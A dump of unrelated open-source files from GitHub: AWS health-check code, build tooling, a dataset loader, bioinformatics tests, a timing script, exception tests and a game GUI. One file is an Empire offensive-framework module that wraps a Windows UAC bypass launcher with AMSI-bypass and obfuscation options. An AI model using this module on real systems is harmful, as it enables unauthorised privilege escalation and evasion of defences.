self.healthy_threshold = int(value)
elif name == 'Timeout':
self.timeout = int(value)
elif name == 'UnhealthyThreshold':
self.unhealthy_threshold = int(value)
else:
setattr(self, name, value)
def update(self):
"""
In the case where you have accessed an existing health check on a
load balancer, this method applies this instance's health check
values to the load balancer it is attached to.
.. note:: This method will not do anything if the :py:attr:`access_point`
attribute isn't set, as is the case with a newly instantiated
HealthCheck instance.
"""
if not self.access_point:
return
new_hc = self.connection.configure_health_check(self.access_point, self)
self.interval = new_hc.interval
self.target = new_hc.target
self.healthy_threshold = new_hc.healthy_threshold
self.unhealthy_threshold = new_hc.unhealthy_threshold
self.timeout = new_hc.timeout
|
{
"content_hash": "bbec381b285030c52f629bacfcab0e1c",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 120,
"avg_line_length": 38.43939393939394,
"alnum_prop": 0.6286953094205755,
"repo_name": "Didacti/botornado",
"id": "6661ea15a2523b5a446f2c325cdc5856aea7eb43",
"size": "3641",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "boto/ec2/elb/healthcheck.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1977043"
}
],
"symlink_target": ""
}
|
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from pants.backend.core.wrapped_globs import Globs
from pants.base.address import Address
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TargetDefinitionException
from pants.base.payload import Payload
from pants.contrib.go.targets.go_target import GoTarget
class GoLocalSource(GoTarget):
@classmethod
def is_go_source(cls, path):
"""Returns `True` if the file at the given `path` is a go source file."""
return path.endswith('.go') and os.path.isfile(path)
@classmethod
def local_import_path(cls, source_root, address):
"""Returns the Go import path for the given address housed under the given source root.
:param string source_root: The path of the source root the address is found within.
:param address: The target address of a GoLocalSource target.
:type: :class:`pants.base.address.Address`
:raises: `ValueError` if the address does not reside within the source root.
"""
return cls.package_path(source_root, address.spec_path)
@classmethod
def create(cls, parse_context, **kwargs):
if 'name' in kwargs:
raise TargetDefinitionException(Address(parse_context.rel_path, kwargs['name']).spec,
'A {} does not accept a name; instead, the name is taken '
'from the the BUILD file location.'.format(cls.alias()))
name = os.path.basename(parse_context.rel_path)
if 'sources' in kwargs:
raise TargetDefinitionException(Address(parse_context.rel_path, name).spec,
'A {} does not accept sources; instead, it always globs all '
'the *.go sources in the BUILD file\'s '
'directory.'.format(cls.alias()))
parse_context.create_object(cls, type_alias=cls.alias(), name=name, **kwargs)
@classmethod
def alias(cls):
"""Subclasses should return their desired BUILD file alias.
:rtype: string
"""
raise NotImplementedError()
def __init__(self, address=None, payload=None, **kwargs):
globs = Globs(rel_path=os.path.join(get_buildroot(), address.spec_path))
sources = globs('*.go')
payload = payload or Payload()
payload.add_fields({
'sources': self.create_sources_field(sources=sources,
sources_rel_path=address.spec_path,
key_arg='sources'),
})
super(GoLocalSource, self).__init__(address=address, payload=payload, **kwargs)
@property
def import_path(self):
"""The import path as used in import statements in `.go` source files."""
return self.local_import_path(self.target_base, self.address)
|
{
"content_hash": "b2aeca52e72b9f0cf604912485d921a3",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 99,
"avg_line_length": 40.513888888888886,
"alnum_prop": 0.6448405896468975,
"repo_name": "kslundberg/pants",
"id": "2b72a4188098c9076c341426edb88a6474149fb9",
"size": "3064",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "contrib/go/src/python/pants/contrib/go/targets/go_local_source.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "767"
},
{
"name": "CSS",
"bytes": "11442"
},
{
"name": "GAP",
"bytes": "2459"
},
{
"name": "Go",
"bytes": "1437"
},
{
"name": "HTML",
"bytes": "70131"
},
{
"name": "Java",
"bytes": "302900"
},
{
"name": "JavaScript",
"bytes": "25075"
},
{
"name": "Protocol Buffer",
"bytes": "3783"
},
{
"name": "Python",
"bytes": "3885765"
},
{
"name": "Scala",
"bytes": "84093"
},
{
"name": "Shell",
"bytes": "49520"
},
{
"name": "Thrift",
"bytes": "2583"
}
],
"symlink_target": ""
}
|
"""Modified Olivetti faces dataset.
The original database was available from (now defunct)
http://www.uk.research.att.com/facedatabase.html
The version retrieved here comes in MATLAB format from the personal
web page of Sam Roweis:
http://www.cs.nyu.edu/~roweis/
There are ten different images of each of 40 distinct subjects. For some
subjects, the images were taken at different times, varying the lighting,
facial expressions (open / closed eyes, smiling / not smiling) and facial
details (glasses / no glasses). All the images were taken against a dark
homogeneous background with the subjects in an upright, frontal position (with
tolerance for some side movement).
The original dataset consisted of 92 x 112, while the Roweis version
consists of 64x64 images.
"""
# Copyright (c) 2011 David Warde-Farley <wardefar at iro dot umontreal dot ca>
# License: Simplified BSD
from os.path import join, exists
from os import makedirs
from cStringIO import StringIO
import urllib2
import numpy as np
from scipy.io.matlab import loadmat
from .base import get_data_home, Bunch
from ..utils import check_random_state
DATA_URL = "http://cs.nyu.edu/~roweis/data/olivettifaces.mat"
TARGET_FILENAME = "olivetti.npy"
# Grab the module-level docstring to use as a description of the
# dataset
MODULE_DOCS = __doc__
def fetch_olivetti_faces(data_home=None, shuffle=False, random_state=0,
download_if_missing=True):
"""Loader for the Olivetti faces data-set from AT&T.
Parameters
----------
data_home : optional, default: None
Specify another download and cache folder for the datasets. By default
all scikit learn data is stored in '~/scikit_learn_data' subfolders.
shuffle : boolean, optional
If True the order of the dataset is shuffled to avoid having
images of the same person grouped.
download_if_missing: optional, True by default
If False, raise a IOError if the data is not locally available
instead of trying to download the data from the source site.
random_state : optional, integer or RandomState object
The seed or the random number generator used to shuffle the
data.
Notes
------
This dataset consists of 10 pictures each of 40 individuals. The original
database was available from (now defunct)
http://www.uk.research.att.com/facedatabase.html
The version retrieved here comes in MATLAB format from the personal
web page of Sam Roweis:
http://www.cs.nyu.edu/~roweis/
"""
data_home = get_data_home(data_home=data_home)
if not exists(data_home):
makedirs(data_home)
if not exists(join(data_home, TARGET_FILENAME)):
print 'downloading Olivetti faces from %s to %s' % (DATA_URL,
data_home)
fhandle = urllib2.urlopen(DATA_URL)
buf = StringIO(fhandle.read())
mfile = loadmat(buf)
np.save(join(data_home, TARGET_FILENAME), mfile['faces'].T)
faces = mfile['faces'].T.copy()
del mfile
else:
faces = np.load(join(data_home, TARGET_FILENAME))
# We want floating point data, but float32 is enough (there is only
# one byte of precision in the original uint8s anyway)
faces = np.float32(faces)
faces = faces - faces.min()
faces /= faces.max()
faces = faces.reshape((400, 64, 64)).transpose(0, 2, 1)
# 10 images per class, 400 images total, each class is contiguous.
target = np.array([i // 10 for i in range(400)])
if shuffle:
random_state = check_random_state(random_state)
order = random_state.permutation(len(faces))
faces = faces[order]
target = target[order]
return Bunch(data=faces.reshape(len(faces), -1),
images=faces,
target=target,
DESCR=MODULE_DOCS)
|
{
"content_hash": "ddf3b44003e1a4474ae7a1b1884f47a7",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 78,
"avg_line_length": 35.29090909090909,
"alnum_prop": 0.6813498196805771,
"repo_name": "joshbohde/scikit-learn",
"id": "6ce33ebfd19d5c40b4d65f4d4826f6b75f46547d",
"size": "3882",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sklearn/datasets/olivetti_faces.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import unittest
import numpy.testing as npt
import numpy as np
from skbio import Sequence, DNA, RNA
from skbio.io.format._base import (_decode_qual_to_phred,
_encode_phred_to_qual, _get_nth_sequence,
_parse_fasta_like_header,
_format_fasta_like_records)
class PhredDecoderTests(unittest.TestCase):
def test_missing_variant_and_phred_offset(self):
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred('abcd')
self.assertIn('`variant`', str(cm.exception))
self.assertIn('`phred_offset`', str(cm.exception))
self.assertIn('decode', str(cm.exception))
def test_variant_and_phred_offset_provided(self):
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred('abcd', variant='sanger', phred_offset=64)
self.assertIn('both', str(cm.exception))
self.assertIn('`variant`', str(cm.exception))
self.assertIn('`phred_offset`', str(cm.exception))
def test_solexa_variant(self):
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred('abcd', variant='solexa')
self.assertIn('719', str(cm.exception))
def test_unrecognized_variant(self):
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred('abcd', variant='illumina')
self.assertIn('variant', str(cm.exception))
self.assertIn("'illumina'", str(cm.exception))
def test_empty_qual_str(self):
npt.assert_equal(_decode_qual_to_phred('', variant='sanger'),
np.array([], dtype=np.uint8))
def test_sanger_variant(self):
# test entire range of possible ascii chars for sanger
all_sanger_ascii = ('!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOP'
'QRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~')
obs = _decode_qual_to_phred(all_sanger_ascii, variant='sanger')
npt.assert_equal(obs, np.arange(94))
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred('a b', variant='sanger')
self.assertIn('[0, 93]', str(cm.exception))
def test_illumina13_variant(self):
# test entire range of possible ascii chars for illumina1.3
all_illumina13_ascii = ('@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijk'
'lmnopqrstuvwxyz{|}~')
obs = _decode_qual_to_phred(all_illumina13_ascii,
variant='illumina1.3')
npt.assert_equal(obs, np.arange(63))
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred('a!b', variant='illumina1.3')
self.assertIn('[0, 62]', str(cm.exception))
def test_illumina18_variant(self):
# test entire range of possible ascii chars for illumina1.8
all_illumina18_ascii = ('!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKL'
'MNOPQRSTUVWXYZ[\\]^_')
obs = _decode_qual_to_phred(all_illumina18_ascii,
variant='illumina1.8')
npt.assert_equal(obs, np.arange(63))
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred('AaB', variant='illumina1.8')
self.assertIn('[0, 62]', str(cm.exception))
def test_custom_phred_offset(self):
ascii_chars = '*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\'
obs = _decode_qual_to_phred(ascii_chars, phred_offset=42)
npt.assert_equal(obs, np.arange(51))
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred(ascii_chars, phred_offset=43)
self.assertIn('[0, 83]', str(cm.exception))
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred(ascii_chars, phred_offset=0)
self.assertIn('`phred_offset`', str(cm.exception))
self.assertIn('printable', str(cm.exception))
with self.assertRaises(ValueError) as cm:
_decode_qual_to_phred(ascii_chars, phred_offset=127)
self.assertIn('`phred_offset`', str(cm.exception))
self.assertIn('printable', str(cm.exception))
class PhredEncoderTests(unittest.TestCase):
def test_missing_variant_and_phred_offset(self):
with self.assertRaises(ValueError) as cm:
_encode_phred_to_qual([1, 2, 3])
self.assertIn('`variant`', str(cm.exception))
self.assertIn('`phred_offset`', str(cm.exception))
self.assertIn('encode', str(cm.exception))
def test_variant_and_phred_offset_provided(self):
with self.assertRaises(ValueError) as cm:
_encode_phred_to_qual([1, 2, 3], variant='sanger', phred_offset=64)
self.assertIn('both', str(cm.exception))
self.assertIn('`variant`', str(cm.exception))
self.assertIn('`phred_offset`', str(cm.exception))
def test_solexa_variant(self):
with self.assertRaises(ValueError) as cm:
_encode_phred_to_qual([1, 2, 3], variant='solexa')
self.assertIn('719', str(cm.exception))
def test_unrecognized_variant(self):
with self.assertRaises(ValueError) as cm:
_encode_phred_to_qual([1, 2, 3], variant='illumina')
self.assertIn('variant', str(cm.exception))
self.assertIn("'illumina'", str(cm.exception))
def test_no_phred_scores(self):
self.assertEqual(_encode_phred_to_qual([], variant='sanger'), '')
def test_sanger_variant(self):
# test entire range of possible ascii chars for sanger
all_sanger_ascii = ('!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOP'
'QRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~')
obs = _encode_phred_to_qual(list(range(94)), variant='sanger')
self.assertEqual(obs, all_sanger_ascii)
with self.assertRaises(ValueError) as cm:
_encode_phred_to_qual([42, -1, 33], variant='sanger')
self.assertIn('-1', str(cm.exception))
self.assertIn('[0, 93]', str(cm.exception))
obs = npt.assert_warns(UserWarning, _encode_phred_to_qual,
[42, 94, 33], variant='sanger')
self.assertEqual(obs, 'K~B')
def test_illumina13_variant(self):
# test entire range of possible ascii chars for illumina1.3
all_illumina13_ascii = ('@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijk'
'lmnopqrstuvwxyz{|}~')
obs = _encode_phred_to_qual(list(range(63)), variant='illumina1.3')
self.assertEqual(obs, all_illumina13_ascii)
with self.assertRaises(ValueError) as cm:
_encode_phred_to_qual([42, -1, 33], variant='illumina1.3')
self.assertIn('-1', str(cm.exception))
self.assertIn('[0, 62]', str(cm.exception))
obs = npt.assert_warns(UserWarning, _encode_phred_to_qual,
[42, 63, 33], variant='illumina1.3')
self.assertEqual(obs, 'j~a')
def test_illumina18_variant(self):
# test entire range of possible ascii chars for illumina1.8
all_illumina18_ascii = ('!"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKL'
'MNOPQRSTUVWXYZ[\\]^_')
obs = _encode_phred_to_qual(list(range(63)), variant='illumina1.8')
self.assertEqual(obs, all_illumina18_ascii)
with self.assertRaises(ValueError) as cm:
_encode_phred_to_qual([42, -1, 33], variant='illumina1.8')
self.assertIn('-1', str(cm.exception))
self.assertIn('[0, 62]', str(cm.exception))
obs = npt.assert_warns(UserWarning, _encode_phred_to_qual,
[42, 63, 33], variant='illumina1.8')
self.assertEqual(obs, 'K_B')
def test_custom_phred_offset(self):
ascii_chars = '*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\'
obs = _encode_phred_to_qual(list(range(51)), phred_offset=42)
self.assertEqual(obs, ascii_chars)
with self.assertRaises(ValueError) as cm:
_encode_phred_to_qual([42, -1, 33], phred_offset=42)
self.assertIn('-1', str(cm.exception))
self.assertIn('[0, 84]', str(cm.exception))
obs = npt.assert_warns(UserWarning, _encode_phred_to_qual,
[42, 255, 33], phred_offset=42)
self.assertEqual(obs, 'T~K')
class TestGetNthSequence(unittest.TestCase):
def setUp(self):
def generator():
for i in range(1, 6):
yield 'goldilocks: ' + str(i)
self.gen = generator()
def test_seq_num_too_small(self):
with self.assertRaises(ValueError) as cm:
_get_nth_sequence(self.gen, 0)
self.assertIn('between 1 and', str(cm.exception))
self.assertIn('0', str(cm.exception))
def test_seq_num_too_big(self):
with self.assertRaises(ValueError) as cm:
_get_nth_sequence(self.gen, 6)
self.assertIn('end of file', str(cm.exception))
self.assertIn('6th', str(cm.exception))
def test_seq_num_just_right(self):
value = _get_nth_sequence(self.gen, 3)
self.assertEqual(value, 'goldilocks: 3')
class TestParseFASTALikeHeader(unittest.TestCase):
def test_no_id_or_description(self):
obs = _parse_fasta_like_header('> \t\t \n')
self.assertEqual(obs, ('', ''))
def test_id_only(self):
obs = _parse_fasta_like_header('>suht! \t\t \n')
self.assertEqual(obs, ('suht!', ''))
def test_description_only(self):
obs = _parse_fasta_like_header('> suht! \t\t \n')
self.assertEqual(obs, ('', 'suht!'))
def test_id_and_description(self):
obs = _parse_fasta_like_header('>!thus suht! \t\t \n')
self.assertEqual(obs, ('!thus', 'suht!'))
class TestFormatFASTALikeRecords(unittest.TestCase):
def setUp(self):
def generator():
yield Sequence('ACGT', metadata={'id': '', 'description': ''},
positional_metadata={'quality': range(4)})
yield RNA('GAU', metadata={'id': ' foo \t\t bar ',
'description': ''})
yield DNA('TAG',
metadata={'id': '', 'description': 'foo\n\n bar\n'})
yield Sequence('A',
metadata={'id': 'foo', 'description': 'bar baz'},
positional_metadata={'quality': [42]})
self.gen = generator()
def test_no_replacement(self):
exp = [
('', 'ACGT', range(4)),
(' foo \t\t bar ', 'GAU', None),
(' foo\n\n bar\n', 'TAG', None),
('foo bar baz', 'A', [42])
]
obs = list(_format_fasta_like_records(self.gen, None, None, False))
self.assertEqual(len(obs), len(exp))
for o, e in zip(obs, exp):
npt.assert_equal(o, e)
def test_empty_str_replacement(self):
exp = [
('', 'ACGT', range(4)),
('foobar', 'GAU', None),
(' foo bar', 'TAG', None),
('foo bar baz', 'A', [42])
]
obs = list(_format_fasta_like_records(self.gen, '', '', False))
self.assertEqual(len(obs), len(exp))
for o, e in zip(obs, exp):
npt.assert_equal(o, e)
def test_multi_char_replacement(self):
exp = [
('', 'ACGT', range(4)),
('-.--.-foo-.--.--.--.-bar-.-', 'GAU', None),
(' foo_-__-_ bar_-_', 'TAG', None),
('foo bar baz', 'A', [42])
]
obs = list(_format_fasta_like_records(self.gen, '-.-', '_-_', False))
self.assertEqual(len(obs), len(exp))
for o, e in zip(obs, exp):
npt.assert_equal(o, e)
def test_newline_character_in_id_whitespace_replacement(self):
with self.assertRaisesRegex(ValueError, r'Newline character'):
list(_format_fasta_like_records(self.gen, '-\n--', ' ', False))
def test_newline_character_in_description_newline_replacement(self):
with self.assertRaisesRegex(ValueError, r'Newline character'):
list(_format_fasta_like_records(self.gen, None, 'a\nb', False))
def test_empty_sequence(self):
def blank_seq_gen():
yield from (DNA('A'), Sequence(''), RNA('GG'))
with self.assertRaisesRegex(ValueError, r'2nd.*empty'):
list(_format_fasta_like_records(blank_seq_gen(), None, None,
False))
def test_missing_quality_scores(self):
def missing_qual_gen():
yield from (RNA('A', positional_metadata={'quality': [42]}),
Sequence('AG'),
DNA('GG', positional_metadata={'quality': [41, 40]}))
with self.assertRaisesRegex(ValueError,
r'2nd sequence.*quality scores'):
list(_format_fasta_like_records(missing_qual_gen(), '-', '-',
True))
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "dfa3d229ea5b252e8c316eb23c93aa73",
"timestamp": "",
"source": "github",
"line_count": 317,
"max_line_length": 79,
"avg_line_length": 41.27444794952682,
"alnum_prop": 0.5652705594619383,
"repo_name": "gregcaporaso/scikit-bio",
"id": "059a45785024d83a11d90542649a6049892b023a",
"size": "13438",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "skbio/io/format/tests/test_base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "822164"
},
{
"name": "CSS",
"bytes": "4379"
},
{
"name": "Cython",
"bytes": "66355"
},
{
"name": "Dockerfile",
"bytes": "904"
},
{
"name": "Jupyter Notebook",
"bytes": "210926"
},
{
"name": "Makefile",
"bytes": "1075"
},
{
"name": "Python",
"bytes": "2960199"
},
{
"name": "Roff",
"bytes": "471"
}
],
"symlink_target": ""
}
|
import os
from easyprocess import EasyProcess
str = 'Total time: '
def main():
dir = os.getcwd() # this returns current directory of monaTest.py
dir = os.path.join(dir, 'lift') # this joins the current directory and the directory to MonaFiles
#print header of the output in format
#print '%-25s %-25s'%('File Name', 'Total Time')
for root, dirs, files in os.walk(dir):
for fname in files:
#print fname
fullName = 'lift/'+fname
if fname.endswith('.mona'):
callProcess('mona '+ fullName, fname)
#this function is slightly different from monaTest.py, this only prints file name and its total time in millliseconds
def callProcess(command, filename):
#set timeout in seconds below in .call(timeout=XX)
proc = EasyProcess(command).call(timeout=60)
totalTime = 60000 #default totaltime is timeout on 60000ms
#it will be refreshed if the experiment does not exceed time limit
output = proc.stdout
if output is None:
print '%-25s %-25s'%(filename, 'error')
else:
# below will check the information of each file
if 'unsatisfiable' in output:
satisfiability = 'false'
else:
satisfiability = 'true'
if '100%' in output:
# if the AUTOMATON CONSTRUCTION is 100%,
# that means this MONA file has complete result
for line in output.split(os.linesep):
if str in line:
# extract total time
time= line[line.index(str)+len(str):].encode('raw_unicode_escape').decode('utf8')
totalTime= int(time[6:8])*1000+int(time[9:11])*10+int(time[3:5])*60000
else:
# if the AUTOMATON CONSTRUCTION is not 100%,
# that means it exceeds the timeout limit
totalTime = 60000
satisfiability = ''
#print each file's info in format
print '%-25s %-25s %-25s'%(filename, totalTime, satisfiability)
main()
|
{
"content_hash": "5c2ff285b16e6c2154c68d2490cef230",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 117,
"avg_line_length": 39.92156862745098,
"alnum_prop": 0.6075638506876228,
"repo_name": "lorisdanto/automatark",
"id": "d4a4ef98eae1c66925d0c1437971c3f05d3afffd",
"size": "2783",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "m2l-str/LTL-finite/monaScriptM2L.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "149632"
},
{
"name": "Java",
"bytes": "306917"
},
{
"name": "OCaml",
"bytes": "294926"
},
{
"name": "Python",
"bytes": "10553"
}
],
"symlink_target": ""
}
|
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-BypassUAC',
'Author': ['Leo Davidson', '@meatballs__', '@TheColonial', '@mattifestation', '@harmyj0y', '@sixdub'],
'Description': ("Runs a BypassUAC attack to escape from a medium integrity process "
"to a high integrity process. This attack was originally discovered by Leo Davidson. "
"Empire uses components of MSF's bypassuac injection implementation as well as "
"an adapted version of PowerSploit's Invoke--Shellcode.ps1 script for backend lifting."),
'Software': '',
'Techniques': ['T1088'],
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1',
'https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/bypassuac_injection.rb',
'https://github.com/rapid7/metasploit-framework/tree/master/external/source/exploits/bypassuac_injection/dll/src',
'http://www.pretentiousname.com/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'Obfuscate': {
'Description': 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required': False,
'Value': 'False'
},
'ObfuscateCommand': {
'Description': 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required': False,
'Value': r'Token\All\1'
},
'AMSIBypass': {
'Description': 'Include mattifestation\'s AMSI Bypass in the stager code.',
'Required': False,
'Value': 'True'
},
'AMSIBypass2': {
'Description': 'Include Tal Liberman\'s AMSI Bypass in the stager code.',
'Required': False,
'Value': 'False'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# Set booleans to false by default
Obfuscate = False
AMSIBypass = False
AMSIBypass2 = False
listenerName = self.options['Listener']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
if (self.options['Obfuscate']['Value']).lower() == 'true':
Obfuscate = True
ObfuscateCommand = self.options['ObfuscateCommand']['Value']
if (self.options['AMSIBypass']['Value']).lower() == 'true':
AMSIBypass = True
if (self.options['AMSIBypass2']['Value']).lower() == 'true':
AMSIBypass2 = True
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-BypassUAC.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print(helpers.color("[!] Invalid listener: " + listenerName))
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, obfuscate=Obfuscate,
obfuscationCommand=ObfuscateCommand, userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2)
if launcher == "":
print(helpers.color("[!] Error in launcher generation."))
return ""
else:
scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher)
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
|
{
"content_hash": "09a7b99e989b0be5acbaa9986575cd6c",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 151,
"avg_line_length": 41.8109756097561,
"alnum_prop": 0.5365320110835642,
"repo_name": "byt3bl33d3r/Empire",
"id": "373eaa6b5954b37b3bf6138d45d92c276440dad3",
"size": "6857",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/modules/powershell/privesc/bypassuac.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Java",
"bytes": "496"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2198"
},
{
"name": "PowerShell",
"bytes": "16998705"
},
{
"name": "Python",
"bytes": "2789955"
},
{
"name": "Shell",
"bytes": "10123"
}
],
"symlink_target": ""
}
|
import pytest
# local imports
from shpkpr import exceptions
@exceptions.rewrap(ValueError)
def _this_doesnt_raise():
"""Dummy func for testing the exceptions.rewrap decorator
"""
return 'something'
@exceptions.rewrap(ValueError)
def _this_raises_a_key_error():
"""Dummy func for testing the exceptions.rewrap decorator
"""
return {}['non-existant-key']
@exceptions.rewrap(ValueError)
def _this_raises_a_value_error():
"""Dummy func for testing the exceptions.rewrap decorator
"""
return int("banana for scale")
@exceptions.rewrap(ValueError, KeyError)
def _this_also_raises_a_value_error():
"""Dummy func for testing the exceptions.rewrap decorator
"""
return int("I suggest you drop it, Mr. Data")
class ExceptionRaiser(object):
"""Dummy class for testing the exceptions.rewrap decorator
"""
@exceptions.rewrap(KeyError)
def this_raises_a_key_error(self):
return {}['non-existant-key']
@exceptions.rewrap(ValueError)
def this_also_raises_a_key_error(self):
return {}['non-existant-key']
def test_rewrap_func_doesnt_rewrap_uncaught_exception():
with pytest.raises(KeyError):
_this_raises_a_key_error()
def test_rewrap_func_raises_correct_exception():
with pytest.raises(exceptions.ShpkprException):
_this_raises_a_value_error()
def test_rewrap_func_raises_correct_exception_keyerror():
with pytest.raises(KeyError):
_this_also_raises_a_value_error()
def test_rewrap_method_raises_correct_exception():
obj = ExceptionRaiser()
with pytest.raises(exceptions.ShpkprException):
obj.this_raises_a_key_error()
def test_rewrap_method_doesnt_rewrap_uncaught_exception():
obj = ExceptionRaiser()
with pytest.raises(KeyError):
obj.this_also_raises_a_key_error()
def test_decorated_func_returns_as_normal_when_nothing_is_raised():
assert _this_doesnt_raise() == 'something'
|
{
"content_hash": "930bca451e8fa002267f3ceb7cdafedf",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 67,
"avg_line_length": 25.61842105263158,
"alnum_prop": 0.6985105290190036,
"repo_name": "shopkeep/shpkpr",
"id": "2723b817502957ac0b7ec2a4576a4cd7ed0beb80",
"size": "1969",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_exceptions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "172"
},
{
"name": "Makefile",
"bytes": "2358"
},
{
"name": "Python",
"bytes": "139438"
},
{
"name": "Shell",
"bytes": "1111"
}
],
"symlink_target": ""
}
|
import database as d
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
matplotlib.use('TkAgg')
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import tkinter as tk
import copy
#WARNING: throws error if run from here. Import to economy directory and run from there. Necessary because image files are stored there.
TITLE_FONT = ("Black chancery", "18", "bold")
TEXT_FONT = ("Black chancery", "15")
BUTTON_FONT = ("Black chancery", "13")
class gui(tk.Tk):
def __init__(self, char, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs)
#char is character controller from ai
self.char = char
self.display_cont = None
self.text_cont = None
self.hotkeys = []
self.dynamic_hotkeys = []
self.wm_title("Jonestown")
# root.resizable(0,0)
#megaFrames
leftSide =tk.Frame(self)
rightSide =tk.Frame(self)
#frames
titleImage = tk.PhotoImage(file="./images/jonestown.gif")
titleBar = tk.Label(leftSide, image=titleImage, width=1114, height=150)
titleBar.image = titleImage
display = display_controller(leftSide, self)
printout = text_output( leftSide, self, height=300, width=1114)
charDisplay = static_data( rightSide, self, height=474, width=300, background="yellow")
keyboard = key_controller( rightSide, self, height=474, width=300, background="orange")
self.keyboard = keyboard
quitter = quitBar( rightSide, self, width=300, background="red")
#set controllers
self.display_cont = display
self.text_cont = printout
#printout
printout.grid_propagate(False)
#charData
charDisplay.pack_propagate(False)
#root grid
leftSide.grid( row=0, column=0, sticky=tk.NSEW)
rightSide.grid(row=0, column=1, sticky=tk.NSEW)
#leftSide grid
titleBar.grid(row=0, column=0)
display.grid( row=1, column=0)
